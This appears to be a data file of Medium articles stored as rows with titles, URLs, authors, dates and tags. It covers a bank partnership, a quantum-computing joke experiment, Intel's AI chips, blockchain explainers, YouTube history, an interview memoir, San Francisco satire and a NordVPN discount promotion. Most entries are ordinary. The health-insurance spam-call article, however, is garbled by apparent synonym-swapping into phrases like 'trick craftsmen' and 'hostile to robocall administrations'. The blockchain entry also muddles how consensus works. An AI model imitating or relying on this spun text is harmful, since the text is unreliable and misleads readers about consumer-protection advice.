ZeroBank is excited about this opportunity to improve our service quality and upgrade its security. Mr. Nguyen Nhu Nguyen — CFO of ZeroBank — responded to this event: “There’s no hassle working with Bac A Money Transfer and sharing with them about topics related to remittances. Our CTO, Mr. Bao Ly also shares his knowledges on banking management technology. Bac A Money Transfer is always open to new technology that’s why they’re looking forward to grow with ZeroBank project by signing MOU with the team. ZeroBank has an outstanding team with extensive experience in non-commercial money transfer. More than that, our core members are the super minds in the money exchange and remittance industry. They have been working at top international banking institutions yet still hungry to pursue higher goal of delivering better money transfer service for end users, especially for people living in Southeast Asia.”
*About ZeroBank:
ZeroBank provides everyone with a faster, more convenient and more secure money exchange and transfer method with minimal fee by applying blockchain technology, smart contract along with sharing economy model.
*About Bac A Money Transfer:
Bac A Money Transfer — a subsidiary of Bac A Bank which has more than 20 years of providing safe and trusted banking services for individuals as well as enterprises. Bac A Bank is the commercial joint-stock bank in Vietnam with the authorized capital stock up to 5,500 billions VND, after-tax profit reached 5,223 billions and 387 billions (VND) in 2017
Aiming for the position of top-leading bank by 2020, Bac A Bank is the pioneer in investment and consulting for a generation of sustainable development enterprises, along with high technology applications in agriculture, social security projects. Bac A Bank also has been honored multiple times with certificates of merit as well as won many other prestigious international awards:
Emulation flags of the Government
Vietnam Outstanding Banking Awards 2017
Excellent Business Service Award 2017
Best Bank in Sustainable Development for Community 2015–2016 (Vietnam Outstanding Banking Awards)
Best Corporate Social Responsibility Bank of Vietnam 2016 (by International Finance Magazine (IFM))
Best Innovative Products 2016
Stay updated on our channels: | https://medium.com/zerobank-cash/zerobank-signs-a-strategic-partnership-with-bac-a-money-transfer-32ddf0a810ea | ['Zerobank - Your Local Currency'] | 2018-07-17 03:21:33.686000+00:00 | ['Technology', 'Blockchain', 'Remittances'] |
110 | The stupidest, most technologically and resource inefficient way to multiply by two | The stupidest, most technologically and resource inefficient way to multiply by two
Photo by Drew Graham on Unsplash
What you will read here is a bad idea. Don’t try this at home. You’ve been warned. I’ll be using a metaphorical sledgehammer to crack a hypothetical nut. I am trying to do a much, much lamer version of using a drone to change a light bulb.
Using a quantum computer to multiply by 2, morally — Photo by unknown author on Reddit
What I want is quite simple — I want to calculate 2ⁿ, 2 to the power of n, for any integer n. For example, 2² = 4. That is not a particularly difficult problem. You can work it out pretty reliably by hand using techniques learned in grade school. Or, you can find a table online.
This really isn’t that hard—source: Wikipedia
Suppose I asked my digital assistant for the answer, though. I think you will agree that this might be a bit overkill given how much energy and sophistication is necessary to make the cloud work. But, that is not enough. We want the “killing a mosquito with a bazooka” method. For that, we need to move beyond digital technology and consult a quantum computer! That’s right, and I’m going to use a goddamn quantum computer to multiply by 2.
Get Quantum
Great, so for that, we need a quantum algorithm. Let’s get a bit technical for a second. Below is an algorithm that can compute any eight consecutive powers of 2. (Why eight? Well, quantum computers are kind of small right now.) It looks like a standard electronic circuit, with wires and components and such, but it’s quantum. That means, instead of bits of information, it uses quantum bits (qubits). The first wire is a scratch qubit — it’s just there to help with the calculation. The next three are the binary expansion of n — that’s the input data. Below I have input “111”, so I am asking for 2⁸. (The answer is 256, by the way.)
Circuit for raising 2 to some power. Made using the IBMQ Composer.
Cool, cool. So, that looks pretty complicated. We’re on the right track. Now, we just need some magic techno machine to run the algorithm on. Luckily, I have access to a quantum computer. (Don’t be too impressed — you do too.) I will use one of IBM’s cloud quantum computers. In particular, I will use the quantum processor called “ibmq_16_melbourne,” which is a quantum chip made of superconducting material sitting in a laboratory device that is one hundred times colder than outer space.
Specs for “ibmq_16_melbourne” on 6 June 2021. You can find specs for your IBMQ services here.
I ran the circuit above on IBM’s quantum computer 1,024 times. Unfortunately, the desired outcome showed up only 8 times — that’s less than 1% accuracy. The most common answer, showing up about 1% of the time, was 160. The correct answer, recall, is 256. So… this is not good.
Actually, using a quantum computer to multiply by 2. Photo by unknown author on gifs.com.
The quantum Rube Goldberg solution
Alright, so what gives? At the moment, quantum computers are too noisy to perform arithmetic, but that will not deter Progress™. We need to hack this. How can we get this device to calculate 2⁸? First, we need to ask what a quantum computer is really good at (today). That’s easy! So (today), a quantum computer is pretty good at one thing: making random bit strings. And, how many bit strings can n qubits generate? 2ⁿ!
I like this idea. It’s so simple. It presents a little conundrum, though. Imagine we start performing random experiments and recording outcomes with the intent of estimating the total number of possible outcomes, including those we haven’t even seen yet. Seems almost impossible, right? Well, this is the kind of statistics problem Alan Turing and teams of WWII cryptographers faced when trying to crack ciphers. And, when you stop for a moment, you realize that scientists and statisticians estimate the total number of things they haven’t actually counted all the time — the total number of species on Earth, the total number of stars in the galaxy, the total number of lies in a political speech, and so on.
The core idea in estimating totals from incomplete observations is that repeated events give you a lot of information. For example, flip a coin 10 times. Suppose you see H, H, T, H, T, H, H, T, T, T. Without making assumptions, you can’t know for sure that this coin will result in only these two possible outcomes indefinitely into the future. But, the fact that 8 of the 10 events were repeated events gives you a lot of confidence that’s the case. This can all be formalized with some fancy statistics I won’t bore you with.
So, I fired up Old Faithful (that’s what I’m calling it since “ibmq_16_melbourne” doesn’t quite roll off the tongue) and performed the following procedure:
Select a random instruction. Prepare a canonical state of the device. Apply the randomly chosen instruction from Step 1. Measure the system. Repeat 1–4 until r repeated outcomes are seen. Estimate the quantum dimension to be roughly k²/(2r), where k was the number of experiments needed.
Since the quantum dimension is 2ⁿ, where n is the number of qubits used, I would have my answer.
Quantum level accuracy
For my first experiment, I used 8 qubits to calculate 2⁸. The number of repeated outcomes I was looking for was 599. This is the number that would guarantee (with 95% probability) that the answer would be within 10% of the correct value. It took 849 repetitions of the experiment to reach the desired number of 599 repetitions. The answer? 259 (within 10% error of the true value, 19 times out of 20). Not bad! That’s within 2% of the correct answer!
More repetitions are obviously better. So, I waited to see 1,116 repetitions, which took 1,372 experiments. The answer then was 257. Ooo, so close! Then I was intrigued and performed a bunch more experiments with differing numbers of sought-after repetitions. The results are below.
Now, since Old Faithful has 15 qubits, the final step was obviously to calculate 2¹⁵. Again, going for 599 repetitions (which took 6,215 experiments), the answer would be accurate within 10% (with 95% confidence). And… drumroll… 2¹⁵ ≈ 32,242. (It’s actually 32,768 as per the table above, but not too shabby!) The full set of results are below.
Is there a point to all this?
No, not really. But, maybe? I was actually surprised by how accurate it was. This procedure is obviously useless for estimating 2ⁿ. But, it might be useful for quickly estimating the dimension of quantum devices. All that is necessary is to perform completely randomized experiments and look for repeated outcomes. With 95% confidence, one can estimate any dimension within 10% error by finding 599 repetitions. It takes about square-root the actual dimension to find them all (for a fixed number of sough-after repetitions), which is the best one could hope for. | https://medium.com/@csferrie/the-stupidest-most-technologically-and-resource-inefficient-way-to-multiply-by-two-fd6d0290f7b6 | ['Chris Ferrie'] | 2021-06-07 04:49:41.746000+00:00 | ['Data Science', 'Quantum Computing', 'Technology', 'Experiment', 'Quantum Physics'] |
111 | Intel AI Summit 2019 | Chip Giant Accelerates AI at the Edge | At the Intel AI Summit in San Francisco on Tuesday the company put its chips on the edge, revealing its next-generation Movidius Myriad Vision Processing Unit (VPU) for edge media, computer vision and inference applications. Intel also introduced its new Edge AI DevCloud with the OpenVINO toolkit for edge devices, and demonstrated its Nervana Neural Network Processors for training (NNP-T1000) and inference (NNP-I1000).
The Nervana Neural Network Processors (NNP) are the first purpose-built ASICs for complex deep learning with incredible scale and efficiency for cloud and data center customers.
“We’re one of the largest (AI companies) due to our breadth and depth that allows us to go from data center out to the edge. And we anticipate this growing year on year and this technology transition unfolds. But the most important things we’ve learned is that there really is no single approach for AI,” said Naveen Rao, Intel corporate vice president and general manager of the Intel Artificial Intelligence Products Group. Rao also stressed the necessity of purpose-built hardware like Nervana NNPs and Movidius VPUs to handle AI’s increasing workloads: “With this next phase of AI, we’re reaching a breaking point in terms of computational hardware and memory.”
The new Intel products strengthen the company’s growing portfolio of AI solutions, which is expected to generate more than US$3.5 billion in revenue in 2019. The company aims to provide AI solutions for a range of industries and at any scale.
Intel’s next-generation Movidius VPU, “Keem Bay,” is a low-power, high-performance edge inferencing product that’s scheduled to become available in the first half of 2020. It incorporates efficient architectural advances to deliver more than ten times the inference performance as the previous generation with up to six times the power efficiency of competitors’ processors.
Keem Bay performance compared to NVIDIA TX2, Xavier and Ascend 310.
The DevCloud for the Edge, used by over 2700 enterprises, and the OpenVINO toolkit both address a key pain point for developers — allowing them to try, prototype and test AI solutions on a broad range of Intel processors before they buy hardware.
“Customers are rapidly adopting AI at the edge because the economic and social advantages are just too large to ignore. It’s happening in every industry from smart cities, to industrial, healthcare, and retail,” said Intel corporate vice president of IoT Jonathan Ballon. Intel hopes its hardware and software innovations can not only accelerate AI performance, but also make it easier to attain.
Now in production and also being delivered to customers next year, Intel Nervana NNPs are part of a systems-level AI approach offering a full software stack developed with open components and deep learning framework integration.
Nervana Neural Network Processor (NNP) for training (NNP-T1000)
The Nervana NNP-T strikes a balance between computing, communication and memory, enabling near-linear, energy-efficient scaling from small clusters up to the largest pod supercomputers. The Intel Nervana NNP-I meanwhile is power- and budget-efficient and ideal for running intense, multimodal inference at real-world scale using flexible form factors. Both products were developed for the AI processing needs of leading-edge AI companies like Baidu and Facebook.
Intel AI Inference Products Group General Manager Gadi Singer identified three highlights of the NNP family as power efficiency, versatility, and scale.
“In any environment you are limited by power, and power is also a major factor in the TCO (total cost of ownership) of computing. Power efficiency helps you physically put things more dense,” Singer told Synced in a press briefing.
“The second thing is versatility. Some of the solutions that we see are solving a particular problem like for image recognition, which is a very popular use. What we had as a driving force from the beginning is that it must support multiple usages.”
Singer says when it comes to scaling capability, “hardware software optimization together is a must.” NNP architecture is structured with building blocks, which makes it flexible and easy to interconnect. Intel is also working hard to customize its software to match hardware from the top down. “I actually have more of my team working on software than working on hardware.”
Facebook’s AI System Co-Design Director Misha Smelyanskiy told the summit audience: “We are excited to be working with Intel to deploy faster and more efficient inference compute with the Intel Nervana NNP-I and to extend support for our state-of-the-art deep learning compiler Glow to the NNP-I.”
Ballon also announced the first edge AI nanodegree that Intel will be offering in association with online education platform Udacity to provide industry practitioners — even those without a background in computer sciences — with the skills required to develop their own AI models where data is generated at the edge.
To create more opportunities for women in technology and AI, the company is making 750 scholarships available, mostly for the international non-profit organization Women Who Code, which provides services for women pursuing tech careers and a job board for companies seeking female coding professionals. | https://medium.com/syncedreview/intel-ai-summit-2019-chip-giant-accelerates-ai-at-the-edge-efe823015009 | [] | 2019-11-14 18:31:01.557000+00:00 | ['Artificial Intelligence', 'Conference', 'Technology', 'Intel', 'Hardware'] |
112 | An Introduction to Asch Chain Interoperate Protocol | Last month Asch released the chain interoperate protocol, with which Bitcoin can transfer to Asch chain and be used in different DApps. So how is this protocol complemented?
Asch’s chain interoperate protocol is a two-way peg protocol based on multisig federation. There are two kinds of accounts on the Asch chain: normal user accounts and gateway accounts. It is the gateway accounts who handles different kinds of transactions between Asch chain and Bitcoin Network. Every transaction can be checked by the user on the blockchain explorer. | https://medium.com/aschplatform/an-introduction-to-asch-chain-interoperate-protocol-768fb49754ef | [] | 2018-06-26 03:45:10.798000+00:00 | ['Blockchain Technology', 'Asch', 'Development', 'Interoperability', 'Bitcoin'] |
113 | How to improve Kids Skill with STEM Learning Toys !! | How to improve Kids Skill with STEM Learning Toys !!
STEM Toys
STEM Amusement Park Set — London Eye & Ferris Wheel teaches about these wonderful places where children and adults spend countless hours of fun worldwide! This set includes one geared motor to power four large-scale models of amusement rides: Ferris wheel, London Eye, merry-go-round and booster ride. The set comes in a convenient plastic storage tub with lid for easy storage.
Additionally, you can experiment with gears by building four smaller models such as a gearbox, an experimental crane, a carousel and a planetarium. You can find easy-to-follow building instructions for all models either online or in the booklet included. The booklet provides detailed explanations of the different scientific principles applied and incorporates innovative experimental activities for hands-on learning. A Quiz section is also available to challenge your newly acquired knowledge!
STEM Amusement Park Set — London Eye & Ferris Wheel : ENGINO TOY SYSTEM is perhaps the most advanced and versatile three dimensional construction toy in the market today! What makes this product so unique is the variety of innovations in functionality and efficiency. The patented design of the parts allows snap-fit connectivity of up to 6 sides simultaneously! | https://medium.com/@toysadelaide/how-to-improve-kids-skill-with-stem-learning-toys-b1b3de3988c6 | ['Switched On Kids'] | 2020-12-18 05:30:46.909000+00:00 | ['STEM', 'Stem Education', 'Education Technology', 'Science Experiment'] |
114 | Understanding the Analytic Development Lifecycle | As discussed in one of my earlier articles, it is critical to understand the analytic development lifecycle. Your analytics will not last forever, and instead, become obsolete and need to be retired. As you collect more and newer data, you will need to continue maintaining your current analytics while creating new ones. It is essential to understand what you will need to do at each stage of the analytic lifecycle. As seen below, I view the analytic lifecycle as five critical components to development: R&D, Deployment, Testing & Validation, Maintenance, and Retirement. So let’s walk through each element together!
Analytic development lifecycle — image created by the author using LucidChart
Research and Development
Research and development encompass the first few steps in the analytic development lifecycle. After receiving your data, you will spend time looking it over, understanding its structure, and cleaning it. As you go about this process, you need to consider what analytic opportunities you see from the data, any business problems you are aware of, and how they overlap. As you work through developing your problem statement, you can begin to test out analytic concepts and develop your analytic.
This process varies if you are working with existing analytics. For current analytics, you will want to understand the areas that need improvement, methods you will utilize, and any subject matter expertise (SME) you have acquired to help you through these updates. Having followed up conversations with an SME will help you validate if your updates are going in the correct direction or not.
I find the research and development phase of the process to be the most interesting as it is where you can learn the most about your data. I work alongside other data scientists, data engineers, and subject matter experts daily. These individuals help in creating data sets and developing a data dictionary to understand what the data represents. I can then understand how to combine this data with other datasets to build my analyses. I want to make sure I see the larger picture and tell a compelling story before moving further down the process. | https://towardsdatascience.com/understanding-the-analytic-development-lifecycle-2d1c9cd5692e | ['Rose Day'] | 2020-11-08 03:50:11.464000+00:00 | ['Machine Learning', 'Artificial Intelligence', 'Software Development', 'Technology', 'Data Science'] |
115 | 餓了嗎?用比特幣買個肯德基吧 | Two months. Online. Self-Learning to Mastery. Shortest-path to Enter the Blockchain Era.
Follow | https://medium.com/turing-chain-institute-%E5%9C%96%E9%9D%88%E9%8F%88%E5%AD%B8%E9%99%A2/%E9%A4%93%E4%BA%86%E5%97%8E-%E7%94%A8%E6%AF%94%E7%89%B9%E5%B9%A3%E8%B2%B7%E5%80%8B%E8%82%AF%E5%BE%B7%E5%9F%BA%E5%90%A7-3c8a53e2bc73 | [] | 2019-10-10 15:27:24.496000+00:00 | ['Technology', 'Blockchain', 'Blockchain Technology', '區塊鏈'] |
116 | The Story Behind YouTube’s History as a Dating Site | “OK, forget the dating aspect, let’s just open it up to any video”
It was soon clear that the dating idea perhaps wasn’t going to work.
This is where the team decided to open it up to every video instead of keeping it to a niche. Youtube was about to break the age-old rule of sticking to a niche early into their venture.
By breaking this rule, Youtube uploaded its first official video in April 2005 onto the platform during its private beta, Karim’s Me At The Zoo (yes, the video is still up!).
Within a month, Youtube launched its beta version, and the website attracted 30 000 viewers a day, and by half a year, over two million users were using the site daily.
During late 2005, Sequoia Capital invested 3.5 million dollars into Youtube’s Series A. Sequoia partner Roelof Botha had worked at Paypal with the cofounders and learned about the platform after using it to upload honeymoon and wedding videos.
In October 2005, the platform saw its biggest viral video hit one million views. The video was a Nike ad featuring Ronaldinho (see below) receiving his pair of ‘Golden Boots.’ This was the first of many viral videos to hit millions of views.
The Virality Of Youtube
By the end of its first year, Youtube was receiving around 25 million views daily.
One of the biggest reasons for Youtube’s success and subsequent acquisition of Google was its ability to be a virality magnet. Videos posted on the platform could go viral for many reasons, from successful ads to a simple one minute clip of a baby biting someone else’s finger.
In late 2006, Youtube was acquired by Google for 1.65 billion dollars, and the company has since skyrocketed. Today over 2 billion users visit the site every month, and remain the second most used social platform globally.
Youtube has kickstarted the careers of many superstars of the video platform, including Pewdiepie, Michelle Phan, Psy, and more. Without the platform, many wouldn’t have had the chance to chase their passions.
Today Youtube has evolved from helping showcase amateur videos to original content, licensed by singers, bloggers, and more. It has since grown from just collecting ad revenue to a full-fledged streaming platform as well as a subscription service. | https://medium.com/cornertechandmarketing/the-story-of-youtube-s-history-as-a-dating-site-164dfae475a4 | ['Richard Liu'] | 2020-12-27 02:29:55.456000+00:00 | ['Technology', 'Marketing', 'Social Media', 'YouTube', 'Business'] |
117 | 18 interviews. 3 countries. 1 job offer. My interview journey in tech. | Photo by Clem Onojeghuo
Back in 2017, after a year of running my own start-up back in Chile and failing plus having worked in the start-up scene for over 4 years, I decided to look for opportunities outside my home country and get some international work experience, ideally in one of the big tech companies.
The process can get quite exhausting and frustrating, and my experience going through it was no exception.
First Steps — Recruiters
I think every person I’ve talked to has had a different experience with the interview process. Some people have a very smooth one, getting an offer right after the first or second interview and some others have to go through a lot to land one of these opportunities. Mine was in the latter group.
I started by reaching out to my good friends that were already working for various tech giants. This was back in late 2016, around Christmas time. Slowly, recruiters started to reach out and was able to schedule the first interview phone screeners for January / February of 2017. I have to say that the key for this process was the referral by other employees, that fast tracked my application quite a lot and put my resume directly on the recruiter’s desk.
Two processes: Engineer and PM!
Yes, I applied as both a Software Engineer and a PM…. let me explain.
I worked for start-ups primarily as an iOS Software Engineer, but over time I expanded my responsibilities to working in Growth, Design, Customer Engagement and Communication. And when I ran my own start-up, my role abruptly switched completely to sales and strategy.
Having worked on so many things in my start-up career allowed me to discover what I felt passionate about, and for me, I really enjoyed dipping my feet in many subjects while driving the creation and release of a product. “Product Management” looked like that, so I wanted to carry forward with my interview process as a PM. However, only about 30% of the interviews I landed were for a PM position. Tech companies can usually fulfill those roles without having to recruit oversees and the demand for PMs is usually less compared to the one for Software Engineers. So, I decided to interview as a Software Engineer as well. I liked working as a SE, but I knew that sooner or later I’d want to switch over to PM.
The struggle
I had my first couple of phone screener interviews from January through March of 2017. I was on the phone with at least one company per week, from big tech giants like Google, Amazon, Microsoft to “smaller” companies like Spotify, Square, Lyft, Uber, and many others. This was my first time interviewing with companies of this scale, so the entire process was new to me. I had to train, practice and learn. I prepared using standard resources available to everyone: Cracking The PM Interview and The PM Interview. I am not someone who does well on these types of interview tests and quizzes, so I had to practice really hard.
In the span of those 3 months, I had phone screeners with a total of 18 companies. Some of them went well, some of them went horrible. I think I never got used to the phone screener experience, so I was always very nervous. In the end, I managed to move on to the next stage with 7 companies.
Lots of Travel
The toughest part for was yet to come, the on-site interviews.
March was all about scheduling the interviews a few months in advance to prepare for extensive traveling. 7 companies across 3 countries with 2 different career tracks… it sure sounds like a lot.
To do this more efficiently, I batched interviews per continent and also per career track. The first set of interviews were going to be in Europe, Booking.com and Uber in Amsterdam and then a start-up in Berlin. That way my travels would be less exhausting for the whole month I’d spend in the continent. That was my entire month of April.
After I was done with my interviews in Europe, May kicked in and it was time to go across the pond once again, this time to the US. I first had to go all the way to Seattle for my interviews with Microsoft and Amazon, and later fly to NYC for an interview with Shutterstock.
I managed to arrange a remote “on-site” interview with Lyft from Chile before I began this world-wide interview tour, which took the pressure off from having to fly one more time, from Seattle to SF.
I have to admit, it was exciting to fly all over the world interviewing with all these great companies, get to know how they worked, what the culture was like and know more about the exciting work they were doing. But the downside is that it was very exhausting to travel constantly for two months, jumping from one continent to the next. You’re often times jet lagged, tired, sleep deprived and somehow you have to pull yourself together and be in good shape for what sometimes can be grueling interviews.
Feeling frustrated is part of the process
The first month in Europe was challenging but I felt very energized going through the process. It’s a strange feeling because you walk out of a whole day of interviewing feeling like you gave it your best and thinking it went well, but you won’t hear back from the company until a few days have gone by. On top of that, if they say no, it’s likely that the company won’t give you any type of feedback on why they are not moving forward with you.
On my last week in Europe, two out of the three companies I had interviewed with said no. The third one wanted an additional interview with me in NYC (since I was already traveling to the US).
Looking back, I had the tougher set of interviews in the US. These were particularly exhausting, each one of them averaging 5 hrs. I was starting to lose faith as I could no longer tell how well or bad it went after the interview day was over. After my third one, I started to think I would have to return back home with no job offer, and after nearly 5 months spent in the process, that idea didn’t sit well in my head. It was only when I arrived in NY and I was done with all the interviews that I got a call from Microsoft with the good news, 2 weeks after I had the interview with them.
You just have to keep going
Interviews are stressful and exhausting. Sometimes, you’ll think you did great and you won’t hear from the company again. Sometimes you’ll think it didn’t go well and you’ll get called for another round. The bottom line is that while you go through this process it’s best to not think too much about how you did, but rather focus on the next interview and improve how you answer the questions. I think it’s inevitable to feel hopeless at some point of the journey, but persevering is key. Whether it takes 3 interviews or 18 like me, you just have to keep going. | https://medium.com/@karmy/18-interviews-3-countries-1-job-offer-my-interview-journey-in-tech-b97b26aa1da5 | ['Juan Antonio Karmy'] | 2020-11-23 20:05:39.865000+00:00 | ['Tech', 'Interviewing', 'Job Interview', 'Interview', 'Technology'] |
118 | How To Avoid Health Insurance Spam Calls? | Healthcare Tech Outlook | How To Avoid Health Insurance Spam Calls? | Healthcare Tech Outlook Christopher Jan 6·3 min read
Have you received unexpected calls regarding health insurance options? According to reports from consumers across the U.S., health insurance spam calls may be on the rise.
What are Health Insurance Spam Calls?
Health insurance spam calls are exactly what they sound like: calls made by trick specialists endeavoring to convince buyers into paying for costly Health insurance that either offers not many advantages, or doesn’t exist. In any event, when the organization calling is authentic and the Health insurance is genuine, these calls might be illegal on the off chance that you didn’t give your earlier express to the guest to be reached.
Health insurance spam calls started to flood in October 2019. In that month alone, around 288 million robocalls with respect to Health insurance offers were made to purchasers in the U.S. That month was a record-breaking month for trick calls, with around 5.7 billion robocalls got by purchasers the country over.
There are numerous sorts of Health insurance trick calls. These guests may endeavor to charge you an expense in return for their assistance exploring the Health insurance commercial center. Different guests may disclose to you that you need another protection card, and should pay an expense to get it or danger losing your wellbeing inclusion. Despite the fact that the charges that they statement may appear to be little, their genuine objective might be to access your Mastercard number or ledger data.
Many scammers target people who are on Medicare or Medical Assistance. If you have been contacted by someone claiming to be from one of these programs and asking for your credit card information or Social Security number, you may want to contact Medicare directly to ensure that these calls are real before handing over any information.
How Can You Stop Health Insurance Spam Calls?
There are a few different ways to try not to get medical coverage spam calls. Because of the expansion in these sorts of meddlesome robocalls, numerous mobile phone inclusion suppliers have begun offering hostile to robocall administrations to clients. These administrations might have the option to identify potential robocalls and banner them as spam. They may likewise have the option to send these calls quickly to voice message. Verizon, AT&T, and T-Mobile all offer this sort of call screening administration.
Regardless of whether your phone inclusion transporter doesn’t offer this sort of administration, your telephone may have implicit call hindering programming. You might have the option to initiate this element under your settings. Moreover, regardless of whether your telephone doesn’t have programming that can identify potential robocalls, you might have the option to impede singular numbers in the event that you are called more than once from a similar telephone number. Sadly, many trick craftsmen will basically start to call you from an alternate telephone number on the off chance that they accept their calls are being hindered.
You may likewise have the option to download or buy a free or paid application to screen approaching calls and distinguish potential nosy robocalls. In any case, robocall impeding programming isn’t generally compelling. These applications will be unable to identify each approaching robocall, or they may unintentionally hinder calls from companions or family that you need to get. Also, the applications that send robocalls directly to phone message may have the unintended result of filling your voice message box with trick messages.
Check This out : | https://medium.com/@chrishtopher-henry-38679/how-to-avoid-health-insurance-spam-calls-healthcare-tech-outlook-cefad02d4240 | [] | 2021-01-06 12:03:43.317000+00:00 | ['Spam', 'Solutions', 'Healthcare', 'Technology', 'Healthcare Tech Outlook'] |
119 | The Simple Idea of Blockchain. Disruptive technology, trustless… | Disruptive technology, trustless system, decentralized, immutable,peer-peer bla bla bla. These are buzzwords associated with blockchain technology that confuses the bejeezus out of many. But it’s a simple concept and an interesting one at that.
In blockchain technology, data are stored in clusters and strung together. These clusters of digital information are in a box and go in tandem — one after another.
Let’s look at it like a database where you store information but instead of in tabular forms, they are in blocks. Each block has a storage capacity that once full, is added to the existing string of blocks. The blocks form a chronological chain. New data are stored in a fresh block.
I have compared the blockchain to a database but it is not a database. It is a digital ledger or data structure where transactions can be processed. Blocks that are formed and chained together are immutable which means they can’t be changed. Each block refers to the previous because when a block is added to the end of the chain, it is time-stamped.
The decentralized nature of blockchain
Three features of the blockchain give it a decentralized nature:
Timestamps: there is a timeline of data. Data collected in groups involve a block with a set of information. Each of these blocks after being chained together is timestamped. This means that if one block is taken out of the chain, there would be a time gap because the timing would be altered. For instance, It would be hard to miss that block A needs to cross-check with a missing block B to get the correct timing of how and when a transaction occurred. Nodes: these are servers that verify and exchange transactions. These computers are operated by different entities all over the world. These nodes must always come to a consensus. At least 51% of changes have to be made to successfully maneuver the remaining nodes. If one node has been altered, other nodes need to cross-reference to fish out where the inconsistency has occurred. This enables users on the blockchain to view transactions that are occurring in live mode. Hash codes: these codes are created by a maths function that turns digital information into a string of letters and numbers. Hash codes will change if any digital information is changed.
This decentralized nature of the blockchain makes it quite safe and protects the system from fraudulent acts.
Why is it a trustless system?
I think that the most confusing of all the confusion associated with blockchain technology has to do with describing it as a ‘trustless’ system. The decentralized nature of the blockchain should strengthen one’s trust in the system. Trustless shouldn’t be a word associated with it, innit?
Trustless in this regard has to do with an absence of the need to trust. The blockchain is built in such a way that each computer can act as a server for the others. This means that every user is allowed shared access to how transactions occur without the need for a central server. Every user has direct access to the information. There are no third parties. In the case of bitcoin, everyone is in control because it’s a public ledger.
Yusuf Fatai-Ayodele a Tech expert explains it clearly in these words,
‘’Trustless means you do not require any trust. Unlike putting money in a bank account, you are putting trust in your bank that it would be safe, it is never like that with blockchain because it is trustless in the sense that you don’t require any trust of anyone or party as the blockchain network is a self-working protocol that executes once the written rules are met”.
I have talked of blockchain in the light of how it is being used in bitcoin. Blockchains do not come in only this form. There are different kinds of blockchains. They can be public, private, consortium, or hybrid. Blockchains can also be centralized or decentralized.
Blockchain technology has continued to gain popularity. This was after it received a lot of criticism from the outset. Some big firms have embraced it and believers in this system think that if government parastatals embrace this technology, transparency would trump corruption. Still, others believe that it isn’t worth the whole fuss. One thing is sure about blockchain technology, we haven’t seen the best one yet. Like with all other technology, it can only get better. | https://medium.com/@jubileechukwuma/the-simple-idea-of-blockchain-9ac5a01c0740 | ['Amaka Chukwuma Jubilee'] | 2020-12-26 15:44:00.162000+00:00 | ['Fintech', 'Blockchain', 'Blockchain Technology', 'Content Writing', 'Copywriting'] |
120 | My Typical San Francisco Day | Co-authored by Amanda Legge and Erica Messner.
Illustration by Carlos Gamero Morales
I awake to the barking seals of Fisherman’s Wharf at precisely 10:34 a.m. After scrolling through Reddit from my bed with one sleepy eye, I head to the bathroom to drink some fresh Hetch Hetchy water straight from the sink. I look outside. It’s sunny, like it always is, and foggy, like it always is. I put a flower in my hair, walk down the wide front steps of my house, and wave good morning to my neighbors, Mary Kate & Ashley.
Then, I hop on the cable car, which I take all the way to Blue Bottle Coffee. Here, I wait in line behind 30 other people for a hand-poured, drip coffee, which I pay 17 dollars for. I use these precious minutes in line to check Product Hunt and read through Launch Ticker to make sure I didn’t inadvertently miss any big start-up or V.C. updates while I was sleeping. I make sure my AirPods are in tight and the music is bumping extra loud so that I can barely hear my name when my coffee is ready. Once I’ve got my coffee, I hop on a Bird scooter to go the remaining block to my downtown office.
My office is full of natural light and ping pong tables, and it even has a speakeasy hidden behind two swiveling library wall doors. We have an open floor plan, especially since our C.E.O. removed the desks last December for a company-wide Nerf gun battle. Now it’s just empty space and innovation. The perfect echo chamber, I like to say. I head to the kitchen, which is stocked with 100 gallons of coffee, a full keg, compostable utensils, and an infinite selection of fruits and nuts. Just like every morning, I grab one of the plump, perfectly ripe avocados to make myself avocado toast.
After work, I meet up with friends at Dolores Park. I leave the office around 4 p.m. to beat the rush hour. Assuming there aren’t any medical emergencies, it’s a pretty quick BART ride. When I get to our normal spot by the playground, my friends have already cracked open a few bottles of Anchor Steam. The truffle man and the pineapple-rum guy are making their usual rounds and I happily consume everything they offer me. As I twirl a blade of grass between my fingers, I stare out over the tennis courts at our beautiful city skyline and think about how lucky I am to live here.
My reflections are soon interrupted by my rumbling stomach, so I head to La Taqueria and El Farolito for a burrito. After that, I call it a night and request a Lyft Line. When my car arrives, I squeeze into the back seat next to my yoga teacher. Serves me right for trying to save $3. We drop the guy in the front seat off at Zeitgeist for his friend’s going away party and then make our way to the Castro where we pick up two charming gay men. We drive over the Golden Gate bridge, past Sutro tower, and up windy Lombard street. I listen to stories about their insecure friend Chodar and the types of guys he likes to go out with, and the ride flies by. As the Lyft Line approaches my delightfully crumbling Victorian house, I thank the driver and say a quick Namaste to my yoga teacher before hopping out. I finish the night by packing my last pair of Allbirds into a box — I’m moving to New York City! | https://medium.com/the-san-franciscan/my-typical-san-francisco-day-632e542226db | ['Erica Messner'] | 2021-01-14 17:35:31.436000+00:00 | ['San Francisco', 'Bay Area', 'Technology', 'Humor'] |
121 | 442oons offer a NordVPN discount, be a smart soccer fan — protect yourself online | 442oons is a highly successful YouTube channel that has over 2.5 million subscribers. They create animated football parodies with songs and pictures.
Dean Stobbart, originally a teacher from Norton, had in the past been a part-time voice actor also did some animation for his lessons.
Dean saw a gap in the marked that “no one really had done football cartoons before”, and he decided to make his first video — a cartoon parody of Luis Suárez and Arsenal manager Arsène Wenger in a scene from The Silence of the Lambs.
Now 442oons offer a NordVPN discount for people that are concerned about their online safety.
How to get a NordVPN discount from 442oons?
Click on the link below:
442oons NordVPN 3-year subscription 70% discount
As soon as you will click on the link, you will be redirected to the NordVPN official website. Right there you will need to enter your payment details and choose a subscription (choose a 3-year deal) and at the bottom of the page you will see that the discount coupon has been automatically applied to your purchase:
What do you get from NordVPN?
With 442oons 70% discount coupon for 3-year NordVPN subscription you become safe and secure online. The AES Military grade encryption standard will ensure you can safely browse on Public Wi-Fi networks and hackers won’t be able to steal your data — even if somebody will be able to do so, there’s no chance to decrypt it. In addition, whenever you connect to one of the 5000+ servers located in 62 countries, you won’t be encumbered by slow internet connection due to the fact that NordVPN does not limit your bandwidth — you can stream movies, play online video games, torrent files and remain secure all at the same time.
Never heard of 442oons?
442oons started growing their user base back in 2013 after uploading Luis Suarez Silence of the Lambs remake and continued uploading soccer cartoons ever since.
Dean Stobbart, a creator of 442oons trained as an actor in London, worked in plays and musicals in the West End as well as in TV and films. Afterwards he started working as the voiceover artist. Dean has always been a fan of animated comedy — from Gillian’s Monty Python to South Park, Beavis and Butthead and American Dad.
